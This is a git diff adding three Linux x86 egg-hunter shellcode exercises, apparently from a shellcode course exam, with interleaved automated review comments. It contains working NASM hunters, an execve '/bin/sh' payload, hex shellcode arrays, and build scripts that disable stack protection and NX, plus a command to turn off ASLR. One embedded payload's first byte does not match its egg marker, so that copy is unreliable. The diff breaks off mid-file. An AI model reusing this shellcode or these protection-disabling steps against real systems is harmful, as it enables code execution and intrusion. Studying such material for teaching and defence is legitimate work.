diff --git a/exam3/access-noloop/NOTES b/exam3/access-noloop/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/access-noloop/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam3/access-noloop/USAGE b/exam3/access-noloop/USAGE
new file mode 100644
index 0000000..a27d412
--- /dev/null
+++ b/exam3/access-noloop/USAGE
@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+access-noloop$ ./make.sh "HereItIs"
+ [I] Using custom EGG mark: HereItIs
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5260 Mar 28 13:01 ./shellcode
+ [+] All done!
+
+3. Run the shellcode
+
+access-noloop$ ./shellcode
+Hunter Length: 66
+Payload Length: 36
+sh-4.1$
+
diff --git a/exam3/access-noloop/hunter.nasm b/exam3/access-noloop/hunter.nasm
new file mode 100644
index 0000000..712a8e3
--- /dev/null
+++ b/exam3/access-noloop/hunter.nasm
@@ -0,0 +1,87 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: hunter.nasm *access +noloop modification
+; Author: Andrey Arapov
+; 2013 March
+;
+;
+
+section .data
+ egg1 equ "Egg-" ; DWORD Egg marker part1
+ egg2 equ "Mark" ; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+ ; function Prologue
+ push ebp
+ mov ebp, esp
+
+ ; preserve registers and flags
+ pushad
+ pushfd
+
+
+ ; Used for cmp edx, esi below
+ push 0xfffefff
+ pop esi
+ inc esi
+
+ xor edx, edx ; Searching the whole memory
+
+
+ ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
+nextPage:
+; cmp edx, 0xffff000
+ cmp edx, esi ; We don't want NULL bytes
+ jz Return ; Egg Hunter will go for retirement (i.e. we simply prevent forever-loop in case if there is no Egg)
+
+ or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE)
+
+nextAddr:
+ inc edx ; Searching forward
+
+ ; Checking if memory is accessible
+ push byte +0x21 ; 0x21 = 33 = __NR_access
+ pop eax ; EAX points to 0x21
+ lea ebx, [edx+0x8] ; next address to check
+ xor ecx, ecx ; 0: mode = F_OK
+ int 0x80
+ cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h
+ jz nextPage
+
+
+ ; Searching for the Egg marker (in current page of memory which is accessible)
+ cmp dword [edx], egg1
+ jne nextAddr
+ cmp dword [edx+0x4], egg2
+ jne nextAddr
+
+ lea ecx, [edx+0x8]
+ jmp ecx
+
+Return:
+ ; restore registers and stack
+ popfd
+ popad
+
+ ; function Epilogue
+ mov esp, ebp
+ pop ebp
+
+ ret
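Review bot: The comment on `xor edx, edx` ("Searching the whole memory") contradicts the bound set up just above it: esi is 0x0ffff000 (push 0x0fffefff / pop esi / inc esi), so `cmp edx, esi` / `jz Return` at nextPage ends the scan at 0x0ffff000 and nothing above the low 256 MiB of the address space is ever examined, which is why the NOTES file's ASLR hint matters here. Suggest `xor edx, edx ; start at 0; scan covers [0, 0x0ffff000) only (see cmp edx, esi)` and, on the compare, `cmp edx, esi ; esi = 0x0ffff000, built via push/pop/inc so the encoding has no NUL byte` — the current "We don't want NULL bytes" describes the construction, not the test. The Return epilogue is reached only on that not-found path; `jmp ecx` leaves the pushad/pushfd state on the stack, and the file header should say so since callers of this blob will otherwise expect registers and flags back. `section .data` holds only `equ` lines, which emit nothing, so the section directive is misleading and can go. exam3/access-scasd-noloop/hunter.nasm has the same bound and the same comments.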
diff --git a/exam3/access-noloop/make.sh b/exam3/access-noloop/make.sh
new file mode 100755
index 0000000..a305e35
--- /dev/null
+++ b/exam3/access-noloop/make.sh
@@ -0,0 +1,132 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+ echo " [I] Argument not specified. Using default EGG mark."
+ ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+ echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+ exit 1;
+else
+ echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+ echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+ echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+
+ printf("NO LOOP!\n");
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"
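Review bot: The shebang `#!/usr/bin/env sh` does not match the body: `DEFAULTEGG=( … )` and `NEWEGG=( … )` are bash arrays, `[[ … ]]` is a bash test, and `echo -n` is not portable, so under dash (the default /bin/sh on Debian-family systems) the script aborts at the first array assignment. Change the first line to `#!/usr/bin/env bash`, and make the length test quote its argument and count bytes, which is what the two-dword egg actually requires — `elif [ "$(printf '%s' "$ARG1" | wc -c)" -ne 8 ]; then` — so an egg mark containing spaces or glob characters is rejected instead of being word-split by the unquoted `expr length $ARG1`. As rendered here the heredoc's two `#include` lines carry no header name; if that is not a rendering artifact gcc will reject the generated file, and the heredoc also prints `strlen()` results with `%d` where `%zu` is the matching conversion. The identical script is added as exam3/access-scasd-noloop/make.sh and exam3/access-scasd/make.sh and needs the same fixes.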
diff --git a/exam3/access-noloop/payload.nasm b/exam3/access-noloop/payload.nasm
new file mode 100644
index 0000000..1ab23b8
--- /dev/null
+++ b/exam3/access-noloop/payload.nasm
@@ -0,0 +1,44 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
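Review bot: The header comment names the file `payload-execve-stack.nasm` while it is added as exam3/access-noloop/payload.nasm; update it to `; Filename: payload.nasm` (or add "derived from payload-execve-stack.nasm") so the provenance line stays accurate. The same file is committed byte-for-byte under exam3/access-scasd-noloop and exam3/access-scasd; a one-line comment in each stating that the three copies are meant to stay identical would make later drift visible in review.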
diff --git a/exam3/access-noloop/shellcode.c b/exam3/access-noloop/shellcode.c
new file mode 100644
index 0000000..d205ccf
--- /dev/null
+++ b/exam3/access-noloop/shellcode.c
@@ -0,0 +1,20 @@
+#include
+#include
+
+unsigned char hunter[] = "\x55\x89\xe5\x60\x9c\x68\xff\xef\xff\x0f\x5e\x46\x31\xd2\x39\xf2\x74\x2a\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x08\x31\xc9\xcd\x80\x3c\xf2\x74\xe8\x81\x3a\x48\x65\x72\x65\x75\xe9\x81\x7a\x04\x49\x74\x49\x73\x75\xe0\x8d\x4a\x08\xff\xe1\x9d\x61\x89\xec\x5d\xc3";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x12\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+
+ printf("NO LOOP!\n");
+}
diff --git a/exam3/access-scasd-noloop/NOTES b/exam3/access-scasd-noloop/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/access-scasd-noloop/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam3/access-scasd-noloop/USAGE b/exam3/access-scasd-noloop/USAGE
new file mode 100644
index 0000000..87206e1
--- /dev/null
+++ b/exam3/access-scasd-noloop/USAGE
@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+access-scasd-noloop$ ./make.sh "HereItIs"
+ [I] Using custom EGG mark: HereItIs
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5260 Mar 28 13:14 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+access-scasd-noloop$ ./shellcode
+Hunter Length: 68
+Payload Length: 36
+sh-4.1$
diff --git a/exam3/access-scasd-noloop/hunter.nasm b/exam3/access-scasd-noloop/hunter.nasm
new file mode 100644
index 0000000..3774230
--- /dev/null
+++ b/exam3/access-scasd-noloop/hunter.nasm
@@ -0,0 +1,92 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: hunter.nasm *access-scasd +noloop modification
+; Author: Andrey Arapov
+; 2013 March
+;
+;
+
+section .data
+ egg1 equ "Egg-" ; DWORD Egg marker part1
+ egg2 equ "Mark" ; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+ ; function Prologue
+ push ebp
+ mov ebp, esp
+
+ ; preserve registers and flags
+ pushad
+ pushfd
+
+
+ ; Used for cmp edx, esi below
+ push 0xfffefff
+ pop esi
+ inc esi
+
+
+ cld ; clear direction flag (DF) to use scasd properly
+ xor edx, edx ; Searching the whole memory
+
+ ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
+nextPage:
+; cmp edx, 0xffff000
+ cmp edx, esi ; We don't want NULL bytes
+ jz Return ; Egg Hunter will go for retirement (i.e. we simply prevent forever-loop in case if there is no Egg)
+
+ or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE)
+
+nextAddr:
+ inc edx ; Searching forward
+
+ ; Checking if memory is accessible
+ push byte +0x21 ; 0x21 = 33 = __NR_access
+ pop eax ; EAX points to 0x21
+ lea ebx, [edx+0x4] ; address to check
+ xor ecx, ecx ; 0: mode = F_OK
+ int 0x80
+ cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h
+ jz nextPage
+
+
+ ; Searching for the Egg marker (in current page of memory which is accessible)
+ mov eax, egg1
+ mov edi, edx
+ scasd ; if EAX == EDI, then sets ZF and returns EDI which has address of = edx+0x4
+ jnz nextAddr
+
+ mov eax, egg2
+ lea edi, [edx+4] ; address to check
+ scasd ; if EAX == EDI, then sets ZF and returns edi which has address of = edx+0x4
+ jnz nextAddr
+ jmp edi
+
+Return:
+ ; restore registers and stack
+ popfd
+ popad
+
+ ; function Epilogue
+ mov esp, ebp
+ pop ebp
+
+ ret
+
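Review bot: The `lea edi, [edx+4]` before the second `scasd` is redundant: with DF cleared by `cld`, the first `scasd` has already advanced edi to edx+4, which is exactly what the comment on that line says, so the `lea` can be dropped without changing behaviour. Both scasd comments read "if EAX == EDI", but scasd compares eax with the dword at es:[edi], not with edi itself; `; ZF=1 if eax == [edi]; edi += 4 (DF=0)` is the accurate wording. exam3/access-scasd/hunter.nasm carries the same redundant `lea` and the same two comments.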
diff --git a/exam3/access-scasd-noloop/make.sh b/exam3/access-scasd-noloop/make.sh
new file mode 100755
index 0000000..a305e35
--- /dev/null
+++ b/exam3/access-scasd-noloop/make.sh
@@ -0,0 +1,132 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+ echo " [I] Argument not specified. Using default EGG mark."
+ ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+ echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+ exit 1;
+else
+ echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+ echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+ echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+
+ printf("NO LOOP!\n");
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"
diff --git a/exam3/access-scasd-noloop/payload.nasm b/exam3/access-scasd-noloop/payload.nasm
new file mode 100644
index 0000000..1ab23b8
--- /dev/null
+++ b/exam3/access-scasd-noloop/payload.nasm
@@ -0,0 +1,44 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
diff --git a/exam3/access-scasd-noloop/shellcode.c b/exam3/access-scasd-noloop/shellcode.c
new file mode 100644
index 0000000..343e1fd
--- /dev/null
+++ b/exam3/access-scasd-noloop/shellcode.c
@@ -0,0 +1,20 @@
+#include
+#include
+
+unsigned char hunter[] = "\x55\x89\xe5\x60\x9c\x68\xff\xef\xff\x0f\x5e\x46\xfc\x31\xd2\x39\xf2\x74\x2b\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x04\x31\xc9\xcd\x80\x3c\xf2\x74\xe8\xb8\x48\x65\x72\x65\x89\xd7\xaf\x75\xe7\xb8\x49\x74\x49\x73\x8d\x7a\x04\xaf\x75\xdc\xff\xe7\x9d\x61\x89\xec\x5d\xc3";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+
+ printf("NO LOOP!\n");
+}
diff --git a/exam3/access-scasd/NOTES b/exam3/access-scasd/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/access-scasd/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam3/access-scasd/USAGE b/exam3/access-scasd/USAGE
new file mode 100644
index 0000000..83fad02
--- /dev/null
+++ b/exam3/access-scasd/USAGE
@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+access-scasd$ ./make.sh "MyEgg123"
+ [I] Using custom EGG mark: MyEgg123
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5132 Mar 27 23:37 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+access-scasd$ ./shellcode
+Hunter Length: 46
+Payload Length: 36
+sh-4.1$
diff --git a/exam3/access-scasd/hunter.nasm b/exam3/access-scasd/hunter.nasm
new file mode 100644
index 0000000..5017a13
--- /dev/null
+++ b/exam3/access-scasd/hunter.nasm
@@ -0,0 +1,61 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: hunter.nasm *access-scasd modification
+; Author: Andrey Arapov
+; 2013 March
+;
+;
+
+section .data
+ egg1 equ "Egg-" ; DWORD Egg marker part1
+ egg2 equ "Mark" ; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+ cld ; clear direction flag (DF) to use scasd properly
+ xor edx, edx ; Searching the whole memory
+
+ ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
+nextPage:
+ or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE)
+
+nextAddr:
+ inc edx ; Searching forward
+
+ ; Checking if memory is accessible
+ push byte +0x21 ; 0x21 = 33 = __NR_access
+ pop eax ; EAX points to 0x21
+ lea ebx, [edx+0x4] ; address to check
+ xor ecx, ecx ; 0: mode = F_OK
+ int 0x80
+ cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h
+ jz nextPage
+
+
+ ; Searching for the Egg marker (in current page of memory which is accessible)
+ mov eax, egg1
+ mov edi, edx
+ scasd ; if EAX == EDI, then sets ZF and returns EDI which has address of = edx+0x4
+ jnz nextAddr
+
+ mov eax, egg2
+ lea edi, [edx+4] ; address to check
+ scasd ; if EAX == EDI, then sets ZF and returns edi which has address of = edx+0x4
+ jnz nextAddr
+ jmp edi
diff --git a/exam3/access-scasd/make.sh b/exam3/access-scasd/make.sh
new file mode 100755
index 0000000..00c5f73
--- /dev/null
+++ b/exam3/access-scasd/make.sh
@@ -0,0 +1,130 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
